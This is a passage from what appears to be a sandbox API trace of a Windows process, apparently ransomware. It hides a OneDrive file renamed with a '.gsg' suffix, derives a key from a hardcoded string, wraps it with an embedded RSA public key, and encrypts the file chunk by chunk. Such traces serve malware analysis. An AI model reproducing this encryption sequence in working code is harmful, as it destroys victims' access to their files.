dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0275.219] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0275.219] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2ac90) returned 1 [0275.222] CryptCreateHash (in: hProv=0x2f2ac90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0275.222] lstrlenA (lpString="CABLQIHbnDAxPSPigSVgweTqzMlQm") returned 29 [0275.222] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0275.222] CryptDeriveKey (in: hProv=0x2f2ac90, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb488) returned 1 [0275.222] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0275.222] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0275.222] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f29fd0) returned 1 [0275.223] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29fd0, dwCertEncodingType=0x1, pInfo=0x2f32f90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32fc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32fc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb748) returned 1 [0275.223] CryptEncrypt (in: hKey=0x2fb748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0275.223] CryptEncrypt (in: hKey=0x2fb748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a410*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a410*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0275.223] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2a410*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2a410*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0275.224] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.225] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.225] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.271] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.272] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.272] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.272] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.272] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.272] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.272] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.272] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.272] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.272] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.316] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.316] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.317] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.318] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.319] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.320] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.320] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.320] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.320] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.320] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.320] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.320] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.321] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.321] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.321] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.321] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 